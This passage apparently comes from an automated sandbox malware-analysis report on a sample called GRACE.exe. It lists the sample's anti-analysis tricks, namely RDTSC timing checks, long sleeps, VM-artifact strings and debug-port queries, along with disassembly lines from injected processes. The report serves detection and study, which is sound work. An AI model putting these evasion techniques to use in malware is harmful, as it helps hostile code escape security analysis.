          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GRACE.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000D098E4 second address: 0000000000D098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000000D09B5E second address: 0000000000D09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\GRACE.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\GRACE.exeWindow / User API: threadDelayed 685
          Source: C:\Users\user\Desktop\GRACE.exeWindow / User API: threadDelayed 9173
          Source: C:\Users\user\Desktop\GRACE.exe TID: 6852Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Users\user\Desktop\GRACE.exe TID: 6852Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\GRACE.exe TID: 6856Thread sleep count: 685 > 30
          Source: C:\Users\user\Desktop\GRACE.exe TID: 6856Thread sleep count: 9173 > 30
          Source: C:\Windows\explorer.exe TID: 1260Thread sleep time: -92000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 3476Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: explorer.exe, 00000010.00000000.305340019.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000010.00000002.637677644.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&L
          Source: explorer.exe, 00000010.00000000.309365521.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 00000010.00000000.310539218.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWw5%SystemRoot%\system32\mswsock.dllP1
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\GRACE.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01354120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013599BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01401074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01404015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01404015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01350050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01350050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01339080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01363B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01364BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01405BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h]
